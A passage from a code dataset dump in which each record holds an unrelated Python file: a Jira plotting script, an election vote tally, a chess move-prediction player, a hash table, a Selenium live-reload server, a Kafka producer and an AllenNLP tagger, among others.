feature_array","sub_path":"TorNetwork/IDAPreprocess/packet_parser.py","file_name":"packet_parser.py","file_ext":"py","file_size_in_byte":14404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"542611571","text":"# coding: utf-8\n\nimport datetime\n\nimport matplotlib.pyplot as plt\n\nimport jira\nimport util\n\n\nif __name__ == \"__main__\":\n now = datetime.datetime.now()\n start_str = (now - datetime.timedelta(days=90)).strftime(\"%Y-%m-%d\")\n end_str = now.strftime(\"%Y-%m-%d\")\n query = (\"due >= {} AND due <= {} AND assignee in (currentUser()) \"\n \"AND status = Done ORDER BY due ASC\").format(start_str, end_str)\n issues = jira.search(query)\n plt.plot(\n range(-90, 0),\n util.get_cumlative_time_estimate(\n issues, range(-90, 0), \"timeoriginalestimate\"\n ),\n label=\"time original estimate\"\n )\n plt.plot(\n range(-90, 0),\n util.get_cumlative_time_estimate(\n issues, range(-90, 0), \"timespent\"\n ),\n label=\"time spent\"\n )\n plt.legend(loc=\"upper left\")\n plt.xlabel(\"days\")\n plt.ylabel(\"times (hours)\")\n plt.show()\n","sub_path":"show_time_estimate_accuracy.py","file_name":"show_time_estimate_accuracy.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"306883180","text":"# This program reads in the results from the following five counties:\r\n# Bamoo, Marsh, Queen, Raffah and Trandee.\r\n# Results are summarized into totals results for the election.\r\n\r\nimport csv\r\n\r\n# Initialize the variables\r\n\r\ncandidate = \"none\"\r\ntotal_votes = 0\r\ntotal_correy = 0\r\ntotal_khan = 0\r\ntotal_li = 0\r\ntotal_otooley = 0\r\ncorrey_pct = 0\r\nkhan_pct = 0\r\nli_pct = 0\r\notooley_pct = 0\r\nmax = 0\r\nwinner = \"none\"\r\n\r\n\r\n# Create the lists for the election.\r\n# The candidate portion will need to be updated for each election\r\n\r\n\r\ncandidate_list = [] # Stores the candidate names\r\nvote_pct_list = [] # Stores the percentage of votes for candidates\r\nvote_total_list = [] # Stores the total votes for candidates\r\nelection_dict =[] # Dictionary which stores the election results by candidate\r\n\r\n\r\n\r\npoll_txt = \"poll_results.txt\" # File that holds all the election data\r\n\r\n\r\n# Main program\r\n\r\nwith open(poll_txt, 'r') as csvfile:\r\n\r\n csvreader = csv.reader(csvfile, delimiter = \",\")\r\n\r\n csvheader = next(csvreader)\r\n\r\n # Loop through the file and calculate the total votes for each candidate\r\n for record in csvreader: \r\n\r\n candidate = record[2]\r\n\r\n total_votes += 1\r\n\r\n if candidate == \"Correy\": total_correy += 1 \r\n if candidate == \"Khan\": total_khan += 1\r\n if candidate == \"Li\": total_li += 1\r\n if candidate == \"O'Tooley\": total_otooley += 1\r\n\r\n# The following code determines who the winner is\r\n\r\nmax = total_correy\r\nwinner = \"Correy\"\r\nif total_khan > max:\r\n max = total_khan\r\n winner = \"Khan\"\r\n if total_li > max:\r\n max = total_li\r\n winner = \"Li\"\r\n if total_otooley > max:\r\n winner = \"O'Tooley\"\r\n\r\n\r\n# This code calculates the percentage for each candidate\r\n\r\ncorrey_pct = round((total_correy/total_votes),2)\r\nkhan_pct = round((total_khan/total_votes),2)\r\nli_pct = round((total_li/total_votes),2)\r\notooley_pct = round((total_otooley/total_votes),2)\r\n\r\n# Creating the three lists to be used to create the dictionary of election results\r\n\r\ncandidate_list.append(\"Correy\")\r\ncandidate_list.append(\"Khan\")\r\ncandidate_list.append(\"Li\")\r\ncandidate_list.append(\"O'Tooley\")\r\n\r\nvote_pct_list.append(correy_pct)\r\nvote_pct_list.append(khan_pct)\r\nvote_pct_list.append(li_pct)\r\nvote_pct_list.append(otooley_pct)\r\n\r\nvote_total_list.append(total_correy)\r\nvote_total_list.append(total_khan)\r\nvote_total_list.append(total_li)\r\nvote_total_list.append(total_otooley)\r\n\r\n# Creation of the dictionary of election results\r\n\r\nelection_dict = dict(zip(candidate_list, zip(vote_pct_list, vote_total_list)))\r\n\r\n# Print out the election results\r\n\r\nprint(\" Election Results\")\r\nprint(\"-\" * 25,'\\n')\r\nprint(\" Total Votes: \" + str(total_votes))\r\nprint(\"-\" * 25,'\\n')\r\nfor k,vv in sorted(election_dict.items(), key=lambda p:p[1], reverse=True):\r\n print(\"{} : {}\".format(k,vv))\r\nprint(\"-\" * 25,'\\n')\r\nprint(\" Winner: \" + winner)\r\n\r\n# Save the dictionary of election results as a text file \r\n\r\noutputfile = open(\"election_dict.txt\",\"w\")\r\noutputfile.write( str(election_dict) )\r\noutputfile.close()","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"283066247","text":"# Input ile girilen bir cumledeki sayilarin ve harflerin miktarini hesaplayan bir fonksiyon yaziniz.\n# Ornek input: hello world! 123\n# Output:\n# HARFLER: 10\n# SAYILAR: 3\n\ndef num_letters_and_numbers():\n string = input('Enter a anything: ')\n letters = 0\n nums = 0\n for c in string:\n # check if the char is an alpha char or a digit\n if c.isalpha():\n letters += 1\n elif c.isdigit():\n nums += 1\n\n return f\"\"\"Number of letters in given string is : {letters}\nNumber of digits in given string is : {nums}\n\"\"\"\n\n\nprint(num_letters_and_numbers())\n","sub_path":"Soru5.py","file_name":"Soru5.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"350710590","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 5 18:05:27 2019\n\n@author: raghav\n\"\"\"\n\nfrom typing import Dict, Optional, List, Any\n\nimport numpy\nfrom overrides import overrides\nimport torch\nfrom torch.nn.modules.linear import Linear\nimport torch.nn.functional as F\n\nfrom allennlp.common.checks import check_dimensions_match, ConfigurationError\nfrom allennlp.data import Vocabulary\nfrom allennlp.modules import Seq2SeqEncoder, TimeDistributed, TextFieldEmbedder\nfrom allennlp.models.model import Model\nfrom allennlp.nn import InitializerApplicator, RegularizerApplicator\nfrom allennlp.nn.util import get_text_field_mask, sequence_cross_entropy_with_logits\nfrom allennlp.training.metrics import CategoricalAccuracy, SpanBasedF1Measure\n\n@Model.register(\"chunk_simple_tagger\")\nclass ChunkSimpleTagger(Model):\n\n def __init__(self, vocab: Vocabulary,\n text_field_embedder: TextFieldEmbedder,\n encoder: Seq2SeqEncoder,\n calculate_span_f1: bool = None,\n label_encoding: Optional[str] = None,\n label_namespace: str = None,\n verbose_metrics: bool = False,\n initializer: InitializerApplicator = InitializerApplicator(),\n regularizer: Optional[RegularizerApplicator] = None) -> None:\n super(ChunkSimpleTagger, self).__init__(vocab, regularizer)\n\n self.label_namespace = label_namespace\n self.text_field_embedder = text_field_embedder\n self.num_classes = self.vocab.get_vocab_size(label_namespace)\n self.encoder = encoder\n self._verbose_metrics = verbose_metrics\n self.tag_projection_layer = TimeDistributed(Linear(self.encoder.get_output_dim(),\n self.num_classes))\n\n check_dimensions_match(text_field_embedder.get_output_dim(), encoder.get_input_dim(),\n \"text field embedding dim\", \"encoder input dim\")\n\n # We keep calculate_span_f1 as a constructor argument for API consistency with\n # the CrfTagger, even it is redundant in this class\n # (label_encoding serves the same purpose).\n if calculate_span_f1 and not label_encoding:\n raise ConfigurationError(\"calculate_span_f1 is True, but \"\n \"no label_encoding was specified.\")\n self.metrics = {\n \"accuracy\": CategoricalAccuracy(),\n \"accuracy3\": CategoricalAccuracy(top_k=3)\n }\n\n if calculate_span_f1 or label_encoding:\n self._f1_metric = SpanBasedF1Measure(vocab,\n tag_namespace=label_namespace,\n label_encoding=label_encoding)\n else:\n self._f1_metric = None\n\n initializer(self)\n\n @overrides\n def forward(self, # type: ignore\n tokens: Dict[str, torch.LongTensor],\n tags: torch.LongTensor = None,\n metadata: List[Dict[str, Any]] = None) -> Dict[str, torch.Tensor]:\n # pylint: disable=arguments-differ\n embedded_text_input = self.text_field_embedder(tokens)\n batch_size, sequence_length, _ = embedded_text_input.size()\n mask = get_text_field_mask(tokens)\n encoded_text = self.encoder(embedded_text_input, mask)\n\n logits = self.tag_projection_layer(encoded_text)\n reshaped_log_probs = logits.view(-1, self.num_classes)\n class_probabilities = F.softmax(reshaped_log_probs, dim=-1).view([batch_size,\n sequence_length,\n self.num_classes])\n\n output_dict = {\"logits\": logits, \"class_probabilities\": class_probabilities}\n\n if tags is not None:\n loss = sequence_cross_entropy_with_logits(logits, tags, mask)\n for metric in self.metrics.values():\n metric(logits, tags, mask.float())\n if self._f1_metric is not None:\n self._f1_metric(logits, tags, mask.float())\n output_dict[\"loss\"] = loss\n\n if metadata is not None:\n output_dict[\"words\"] = [x[\"words\"] for x in metadata]\n return output_dict\n\n @overrides\n def decode(self, output_dict: Dict[str, torch.Tensor]) -> Dict[str, torch.Tensor]:\n \"\"\"\n Does a simple position-wise argmax over each token, converts indices to string labels, and\n adds a ``\"tags\"`` key to the dictionary with the result.\n \"\"\"\n all_predictions = output_dict['class_probabilities']\n all_predictions = all_predictions.cpu().data.numpy()\n if all_predictions.ndim == 3:\n predictions_list = [all_predictions[i] for i in range(all_predictions.shape[0])]\n else:\n predictions_list = [all_predictions]\n all_tags = []\n for predictions in predictions_list:\n argmax_indices = numpy.argmax(predictions, axis=-1)\n tags = [self.vocab.get_token_from_index(x, namespace=self.label_namespace)\n for x in argmax_indices]\n all_tags.append(tags)\n output_dict['tags'] = all_tags\n return output_dict\n\n @overrides\n def get_metrics(self, reset: bool = False) -> Dict[str, float]:\n metrics_to_return = {metric_name: metric.get_metric(reset) for\n metric_name, metric in self.metrics.items()}\n\n if self._f1_metric is not None:\n f1_dict = self._f1_metric.get_metric(reset=reset)\n if self._verbose_metrics:\n metrics_to_return.update(f1_dict)\n else:\n metrics_to_return.update({\n x: y for x, y in f1_dict.items() if\n \"overall\" in x})\n return metrics_to_return","sub_path":"setup/models/chunk_tagger.py","file_name":"chunk_tagger.py","file_ext":"py","file_size_in_byte":5923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"630926090","text":"## This function extracts a table from a PDF file and save it in a CSV file\n\nimport pdfplumber\nimport re\nfrom pandas import DataFrame\n\npath = 'sample1.pdf'\n\n\ndef PDFTabletoCSV(path):\n \n pdf = pdfplumber.open(path)\n \n for page in pdf.pages:\n #print(page.extract_text())\n for pdf_table in page.extract_tables():\n table = []\n cells = []\n for row in pdf_table:\n if not any(row):\n if any(cells):\n table.append(cells)\n cells = []\n elif all(row):\n if any(cells):\n table.append(cells)\n cells = []\n table.append(row)\n else:\n if len(cells) == 0:\n cells = row\n else:\n for i in range(len(row)):\n if row[i] is not None:\n cells[i] = row[i] if cells[i] is None else cells[i] + row[i]\n \n \n for row in table:\n print([re.sub('\\s+', '', cell) if cell is not None else None for cell in row])\n print('---------- Line Breaker ----------')\n \n \n pdf.close()\n \n df = DataFrame(table, columns = ['Education', '# of Employees'])\n df.to_csv('data.csv', mode='a', header = False)\n \n print(df)\n \n\n\n#df2 = DataFrame({\n # '# of Employees': [9,62,140,750,961]\n #}, index = ['Postgraduate', '4 Year College', 'Community College', \n #'High School or Less', 'Total']) \n \n\n\n\n","sub_path":"ExtractPDF/TableFromPDF.py","file_name":"TableFromPDF.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"32129680","text":"import argparse\nimport logging\nimport os\nimport json\nimport mysql\nfrom kafka import KafkaConsumer, KafkaProducer\nfrom mysql.connector import errorcode\n\nimport logging\nfrom cassandra.cqlengine import columns\nfrom cassandra.cqlengine.models import Model\nfrom cassandra.cluster import Cluster, BatchStatement\nfrom cassandra.query import SimpleStatement\n\nfrom kafka.client import KafkaClient\nfrom kafka.consumer import SimpleConsumer\nfrom cassandra.cluster import Cluster\nfrom cassandra.policies import DCAwareRoundRobinPolicy\nimport datetime\nimport time\n\nmysql_configs = {\n 'user': 'admin1',\n 'password': 'password',\n 'host': '127.0.0.1',\n 'database': 'aionv4',\n 'raise_on_warnings': True,\n}\n\ndef connect_to_mysql():\n try:\n conn = mysql.connector.connect(**mysql_configs)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or password\")\n print(err)\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"Database does not exist\")\n else:\n print(err)\n return;\n else:\n return conn;\n\ndef get_blocks():\n conn = connect_to_mysql()\n if None != conn:\n cursor = conn.cursor()\n sql = \"SELECT * FROM block\"\n cursor.execute(sql)\n rows = cursor.fetchall()\n return rows;\n conn.close()\n\n\ndef send_produced_messages(messages_list):\n # return\n producer = KafkaProducer(bootstrap_servers='localhost:9092',api_version=(0, 10, 1),\n batch_size=16384)\n topic='aionv4_block'\n for message in messages_list:\n # print 'Sending message: %s' % message;\n # producer.send('test', b'%s' % message)\n # Block until a single message is sent (or timeout)\n future = producer.send(topic, json.dumps(message).encode('utf-8'))\n print(\"producer_block_block_number:{}\".format(message[1]))\n result = future.get(timeout=30)\n\n \n# SET UP PRODUCER\nlogger = logging.getLogger(__name__)\n\n\n# USE PRODUCEER\nproducer_list = list()\nrows = get_blocks()\n\nif producer_list is not None:\n for r in rows:\n producer_list.append(r)\n send_produced_messages(producer_list)","sub_path":"producer_block.py","file_name":"producer_block.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"499437810","text":"import pickle\nimport datetime as dt\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport chess\nimport torch\n\nfrom GameConverter import GameConverter\nfrom PositionConverter import PositionConverter\nfrom PositionHandler import PositionHandler\nfrom utils import read_pgn, clock, get_pos_time, get_time_used\n\n\nclass Player(object):\n def __init__(self, name=\"my\", default_time=1800):\n self.name = name\n self.DEF_TIME = default_time\n self.PRE_EPOCH = 1314835200\n\n\n def build_dataset(self, pgn, all=False):\n data = list()\n games = read_pgn(pgn)\n gconv = GameConverter()\n\n for game in games:\n my_color = gconv.get_my_color(game)\n headers = gconv.gen_header_tags(game)\n otb = headers.get(\"OTB\")\n game_date = headers.get(\"date\")\n if game_date is not None:\n es = dt.datetime.strptime(game_date, \"%Y.%m.%d\").timestamp()\n else:\n es = self.PRE_EPOCH\n time_init = headers.get(\"time_init\", self.DEF_TIME)\n time_inc = headers.get(\"time_inc\", 0)\n if np.isnan(time_inc):\n time_inc = 0\n board = chess.Board()\n for node in game.mainline():\n if all or (my_color is not None and board.turn == my_color):\n pos_time = get_pos_time(node, time_init)\n clock_time = clock(node.comment)\n time_used = get_time_used(pos_time, clock_time)\n\n uci_mv = node.move.uci()\n piece_mv = board.piece_at(\n chess.parse_square(uci_mv[:2])\n ).symbol()\n promote = uci_mv[-1] if len(uci_mv) > 4 else None\n\n data.append(\n (\n board.fen(),\n (uci_mv, piece_mv, promote),\n es,\n (otb, pos_time, clock_time, time_inc),\n )\n )\n\n board = node.board()\n\n with open(f'../data/{self.name}_position_move_dataset', 'wb') as f:\n pickle.dump(data, f)\n\n return data\n\n\n def infer(self, pgn, device):\n model = torch.load('./models/model_20230414.00.08.22')\n\n pconv = PositionConverter()\n phand = PositionHandler()\n\n games = read_pgn(pgn)\n gconv = GameConverter()\n\n for g_i, game in enumerate(games):\n my_color = gconv.get_my_color(game)\n headers = gconv.gen_header_tags(game)\n print(f\"\\n{headers}\")\n\n time_init = headers.get(\"time_init\")\n if time_init is None:\n time_init = self.DEF_TIME\n\n if my_color:\n move_num_syntax = '.'\n else:\n move_num_syntax = '...'\n\n losses = list()\n board = chess.Board()\n for node in game.mainline():\n if board.turn == my_color:\n pos_time = get_pos_time(node, time_init)\n tensor, gamestage = pconv.fen_to_tensor_gamestage(\n board.fen(), (pos_time / phand.SEC_HR)\n )\n\n legal_moves = [move.uci() for move in board.legal_moves]\n legal_moves = [\n (\n move,\n board.piece_at(\n chess.parse_square(move[:2])\n ).symbol(),\n move[-1] if len(move) > 4 else None\n )\n for move in legal_moves\n ]\n if board.fen().split()[1] == \"b\":\n legal_moves = [\n (\n phand.perform_move_color_mirror(move[0]),\n move[1],\n move[2]\n ) for move in legal_moves\n ]\n legal_move_y = [\n phand.gen_label(*move) for move in legal_moves\n ]\n legal_move_y = torch.tensor(legal_move_y).to(device)\n\n uci_mv = node.move.uci()\n piece_mv = board.piece_at(\n chess.parse_square(uci_mv[:2])\n ).symbol()\n promote = uci_mv[-1] if len(uci_mv) > 4 else None\n\n if board.fen().split()[1] == \"b\":\n uci_mv = phand.perform_move_color_mirror(uci_mv)\n\n tensor = tensor.reshape((1, *tensor.shape))\n tensor = torch.tensor(\n np.ascontiguousarray(tensor)\n ).to(device)\n logits = model(tensor)\n legal_logits = torch.gather(\n logits.view(-1), 0, legal_move_y\n )\n legal_move_pr = torch.softmax(legal_logits, 0)\n\n for i,move in enumerate(legal_moves):\n if uci_mv == move[0]:\n loss = -torch.log(legal_move_pr[i]).item()\n break\n\n losses.append(loss)\n\n if board.fen().split()[1] == \"b\":\n legal_moves = [\n (\n phand.perform_move_color_mirror(move[0]),\n move[1],\n move[2]\n ) for move in legal_moves\n ]\n move_pr = {\n mv[0]: float(legal_move_pr[i])\n for i,mv in enumerate(legal_moves)\n }\n move_pr = dict(\n sorted(\n move_pr.items(), key=lambda i: i[1], reverse=True\n )\n )\n move_pr = {k: round(v, 3) for k,v in move_pr.items()}\n move_num_str = ''.join(\n [\n str(board.fullmove_number),\n move_num_syntax,\n board.san(node.move)\n ]\n )\n print(move_num_str)\n print(move_pr)\n\n board = node.board()\n self.create_move_loss_fig(losses, title_suffix=str(g_i))\n print(np.mean(losses))\n print(np.std(losses))\n\n return ...\n\n\n def create_move_loss_fig(\n self,\n losses,\n out_path='./models/test_loss.png',\n title_suffix='',\n window=3,\n ):\n fig, ax = plt.subplots()\n\n ax.set_xlabel('Move Number')\n ax.set_ylabel('CE Loss')\n ax.set_title(\n f'Agent test mean last {window} losses\\n{title_suffix}'\n )\n\n from numpy.lib.stride_tricks import sliding_window_view\n window = min(window, len(losses))\n rolling = sliding_window_view(\n np.array(losses), window_shape=window\n ).mean(axis=1)\n n_episodes = rolling.shape[0] + window\n ax.plot(np.arange(window, n_episodes), rolling)\n\n plt.xticks(\n np.arange(\n window, n_episodes, max(1, int(round(n_episodes / 10)))\n )\n )\n\n split_out_path = out_path.split('.')\n title_suffix += dt.datetime.now().strftime(\"%Y%m%d.%H.%M.%S\")\n plt.savefig(f\".{split_out_path[1]}{title_suffix}.{split_out_path[-1]}\")\n\n return None\n","sub_path":"mlchess/Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":7723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"512561738","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 18 10:55:03 2017\n\n@author: lxr\n\"\"\"\n\nimport os,sys\nbase = 'test_singlepress/'\nos.mkdir(base)\n\nss = \"0123456789abcdefghijklmnopqrstuvwxyz\"\nfor i in ss:\n file_name = base+i\n os.mkdir(file_name)","sub_path":"DeepLearning/keras/genedirs_split.py","file_name":"genedirs_split.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"203291585","text":"import http.server as http, threading ,os,time,sys\n\nfrom selenium import webdriver\n\n\nclass handler(http.CGIHTTPRequestHandler):\n\tdef do_GET(self):\n\t\t\n\t\thandlerFile = HandlerFile()\n\t\thandlerFile.starts = 0\n\n\t\tif self.path.endswith((\".htm\",\".html\")):\n\t\t\tself.send_response(200) \n\t\t\tself.send_header('Content-type',\"text/html\") \n\t\t\tself.end_headers()\n\t\t\tif (os.path.exists(\".\"+self.path)):\n\t\t\t\tself.wfile.write(open(\".\"+self.path,\"rb\").read())\n\t\t\t\thandlerFile.file = self.path\n\t\t\t\thandlerFile.starts = 1\n\t\t\t\thandlerFile.start()\n\n\t\t\telse:\n\t\t\t\tself.wfile.write(b\"

Not Found Page

\")\n\n\t\telif self.path.endswith(\".css\"):\n\t\t\tself.send_response(200) \n\t\t\tself.send_header('Content-type', 'text/css') \n\t\t\tself.end_headers()\n\t\t\tself.wfile.write( (open(self.path.strip(\"/\"),\"r\").read()).encode(\"u8\") )\n\n\n\t\telif self.path.endswith(\".js\"):\n\t\t\tself.send_response(200) \n\t\t\tself.send_header('Content-type', \"text/javascirpt\") \n\t\t\tself.end_headers()\n\t\t\tself.wfile.write( (open(self.path.strip(\"/\"),\"r\").read()).encode(\"u8\") )\n\n\n\nclass HandlerFile(threading.Thread):\n\tdef __init__(self):\n\t\tthreading.Thread.__init__(self)\n\t\t\n\t\t\n\tdef run(self):\n\t\tself.file = os.getcwd()+self.file\n\t\tif os.path.exists(self.file):\n\t\t\tSize_old = os.path.getsize(self.file)\n\t\t\twhile self.starts:\n\t\t\t\ttime.sleep(1)\n\t\t\t\tSize_new = os.path.getsize(self.file)\n\t\t\t\tif Size_old != Size_new :\n\t\t\t\t\ttry:\n\t\t\t\t\t\tdriver.refresh()\n\t\t\t\t\texcept:\n\t\t\t\t\t\ttime.sleep(5)\n\t\t\t\t\t\tdriver.refresh()\n\n\t\t\t\t\tbreak;\n\n\nclass httpServer(threading.Thread):\n\tdef __init__(self,host,port):\n\t\tthreading.Thread.__init__(self)\n\t\tself.server = http.HTTPServer((host,port),handler)\n\n\tdef run(self):\n\t\tself.server.serve_forever()\t\n\n\t\t\nhost = \"127.0.0.1\"\nport = 800\nargv = sys.argv\ndrivers = {\n\t\"firefox\":webdriver.Firefox ,\n\t\"opera\" :webdriver.Opera ,\n\t\"ie\" :webdriver.Ie ,\n\t\"edge\" :webdriver.Edge ,\n\t\"safari\" :webdriver.Safari ,\n\t\"chrome\" :webdriver.Chrome\n}\ntry:\n\n\n\tif len(argv) < 2:\n\t\tprint(len(argv))\n\t\targv.append(\"chrome\")\n\n\tif os.path.exists(argv[1].lower()):\n\t\tif drivers.get(argv[1].lower()):\n\t\t\tdriver = drivers.get(argv[1].lower())()\n\n\t\telse: sys.exit(\"NoFound Name %sDriver !!\"%(argv[1].capitalize()))\n\n\telse: sys.exit(\"NoSach %sDriver !!\"%(argv[1].capitalize()))\n\t\t\n\thttpServer(host,port).start()\n\n\tdriver.get(\"http://%s:%s/index.html\"%(host,port))\n\t\n\twhile True:\n\t\tpass\n\nexcept KeyboardInterrupt:\n\tos.kill(os.getpid(),15)","sub_path":"live.py","file_name":"live.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"275982233","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n# Create your views here.\n\ndef sumar(request, num1, num2):\n\tsuma = int(num1) + int(num2)\n\treturn HttpResponse(\"

La suma de \"\n\t\t\t\t\t\t+ str(num1) + \" + \"\n\t\t\t\t\t\t+ str(num2) + \" es \"\n\t\t\t\t\t\t+ '' + str(suma) + ''\n\t\t\t\t\t\t+\"

\")\n\t\t\t\t\t\t\ndef restar(request, num1, num2):\n\tresta = int(num1) - int(num2)\n\treturn HttpResponse(\"

La suma de \"\n\t\t\t\t\t\t+ str(num1) + \" - \"\n\t\t\t\t\t\t+ str(num2) + \" es \"\n\t\t\t\t\t\t+ '' + str(resta) + ''\n\t\t\t\t\t\t+\"

\")\n\ndef multiplicar(request, num1, num2):\n\tmultiplicacion = int(num1) * int(num2)\n\treturn HttpResponse(\"

La multiplicacion de \"\n\t\t\t\t\t\t+ str(num1) + \" * \"\n\t\t\t\t\t\t+ str(num2) + \" es \"\n\t\t\t\t\t\t+ '' + str(multiplicacion) + ''\n\t\t\t\t\t\t+\"

\")\n\ndef dividir(request, num1, num2):\n\tdivision = int(num1) / int(num2)\n\treturn HttpResponse(\"

La division de \"\n\t\t\t\t\t\t+ str(num1) + \" / \"\n\t\t\t\t\t\t+ str(num2) + \" es \"\n\t\t\t\t\t\t+ '' + str(division) + ''\n\t\t\t\t\t\t+\"

\")\n\ndef error(request):\n\treturn HttpResponse('

Pagina no encontrada

')\n","sub_path":"calc/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"67988277","text":"import sys\nimport mmh3\n \nclass Item:\n\n def __init__(self, key):\n self.key = key\n \nclass HashTable:\n \n def __init__(self, size):\n self.count = 0\n self.table_size = size\n self.table = [[] for i in range(size)]\n \n def hashing(self, key):\n '''\n Used hash is MurmurHash (mmh3 2.2 module).\n '''\n\n return mmh3.hash(key) % self.table_size \n\n def insert(self, item):\n hash = self.hashing(item.key)\n\n for i, it in enumerate(self.table[hash]):\n if it.key == item.key:\n del self.table[hash][i]\n self.count -= 1\n self.table[hash].append(item)\n self.count += 1 \n \n def get(self, key):\n print (\"Getting item(s) with key '\" + key + \"'\")\n hash = self.hashing(key)\n for i, it in enumerate(self.table[hash]):\n if it.key == key:\n return self.table[hash]\n print (\" not in table.\") \n return None\n \n def delete(self, key):\n print (\" Deleting item with key '\" + key + \"'\")\n hash = self.hashing(key)\n for i, it in enumerate(self.table[hash]):\n if it.key == key:\n del self.table[hash][i]\n self.count -= 1\n return\n print (\" not in table.\") \n \n def draw(self, compact=True):\n '''\n Prints hash table to the console, example output:\n\n Number of entries: 6\n [3]\n └── five\n [5]\n └── three\n [6]\n ├── one\n ├── two\n └── six\n [7]\n └── four\n\n If compact is set to false all empty entires will be printed as well.\n '''\n\n print (\" Number of entries: \" + str(self.get_count()))\n for i in range(self.table_size):\n\n if compact:\n if len(self.table[i]) != 0:\n print ( \" [\" + str(i) + \"] \" )\n else:\n print ( \" [\" + str(i) + \"] \" )\n\n for j in range(len(self.table[i])):\n if j == len(self.table[i])-1:\n print(\" └── \" + self.table[i][j].key)\n else:\n print(\" ├── \" + self.table[i][j].key)\n \n def get_count(self):\n return self.count\n \nif __name__ == \"__main__\":\n hs = HashTable(50)\n\n hs.insert(Item(\"one\"))\n hs.insert(Item(\"two\"))\n hs.insert(Item(\"three\"))\n hs.insert(Item(\"four\"))\n hs.insert(Item(\"five\"))\n hs.insert(Item(\"six\"))\n hs.draw()","sub_path":"data_structures/hash_table.py","file_name":"hash_table.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"164113371","text":"import os\nimport pprint\nimport argparse\nimport itertools\nfrom utils import build_directory\nfrom stored_dictionaries.default import default_params\n\n# set random seeds\nimport numpy as np\nnp.random.seed(0)\nfrom tensorflow import set_random_seed\nset_random_seed(0)\n\nimport sys\nsys.path.append('../')\nsys.path.append('../../../')\nimport numpy as np\n\n# from cbrain.imports import *\nfrom cbrain.data_generator import *\nfrom cbrain.utils import limit_mem\nfrom stored_dictionaries.data_options import data_opts\n\nfrom model import Network\nfrom cbrain.model_diagnostics import ModelDiagnostics\n\nparser = argparse.ArgumentParser()\n# ---------------- Important parameters -------------------------\nparser.add_argument('--loss_type', type=str, default='mse', choices=['mse', 'weak_loss'], help='What to run?')\nparser.add_argument('--net_type', type=str, default='normal', choices=['normal', 'conservation'], help='What to run?')\nparser.add_argument('--data', type=str, choices=['fluxbypass_aqua', 'land_data', '8col', '32col'])\n# params okay left as defaults\nparser.add_argument('--batch_size', type=int, default=2048, help='Batch size')\nparser.add_argument('--data_dir', type=str, default='/baldig/chemistry/earth_system_science/')\nparser.add_argument('--epochs', type=int, default=18, help='Number of epochs used for training')\nparser.add_argument('--patience', type=int, default=10, help='How long to wait for an improvement')\nparser.add_argument('--alg', default='baseline')\nFLAGS = parser.parse_args()\n\noutput_path = 'SherpaResults/baselines/{data}/{net_type}_{loss_type}/'.format(\n data=FLAGS.data,\n net_type=FLAGS.net_type,\n loss_type=FLAGS.loss_type,\n)\nmodels_path = output_path + 'Models/'\n\nbuild_directory(models_path)\n\n# Otherwise tensorflow will use ALL your GPU RAM for no reason\nlimit_mem()\n\nargs = vars(FLAGS)\nargs.update(default_params[FLAGS.data])\n\npp = pprint.PrettyPrinter(indent=4)\npp.pprint(args)\n\nif args['data'] == 'fluxbypass_aqua':\n PREFIX = '8col009_01_'\n DATADIR = args['data_dir'] + args['data'] + '/'\n\n scale_dict = load_pickle(DATADIR + '009_Wm2_scaling.pkl'); in_vars = load_pickle(DATADIR + '009_Wm2_in_vars.pkl')\n out_vars = load_pickle(DATADIR + '009_Wm2_out_vars.pkl'); dP = load_pickle(DATADIR + '009_Wm2_dP.pkl')\n\n train_gen = DataGenerator(\n data_fn = DATADIR+PREFIX+'train.nc',\n input_vars = in_vars,\n output_vars = out_vars,\n norm_fn = DATADIR+PREFIX+'norm.nc',\n input_transform = ('mean', 'maxrs'),\n output_transform = scale_dict,\n batch_size=args['batch_size'],\n shuffle=True\n )\n\n valid_gen = DataGenerator(\n data_fn = DATADIR+PREFIX+'valid.nc',\n input_vars = in_vars,\n output_vars = out_vars,\n norm_fn = DATADIR+PREFIX+'norm.nc',\n input_transform = ('mean', 'maxrs'),\n output_transform = scale_dict,\n batch_size=args['batch_size'],\n shuffle=False\n )\n\n net = Network(args, 1,\n \tscale_dict=scale_dict,\n \tsub=train_gen.input_transform.sub,\n \tdiv=train_gen.input_transform.div\n )\nelse:\n from data_generator import DataGenerator\n\n train_gen = DataGenerator(\n data_dir=args['data_dir'] + args['data'] + '/',\n feature_fn=data_opts[args['data']]['train']['feature_fn'],\n target_fn=data_opts[args['data']]['train']['target_fn'],\n batch_size=args['batch_size'],\n 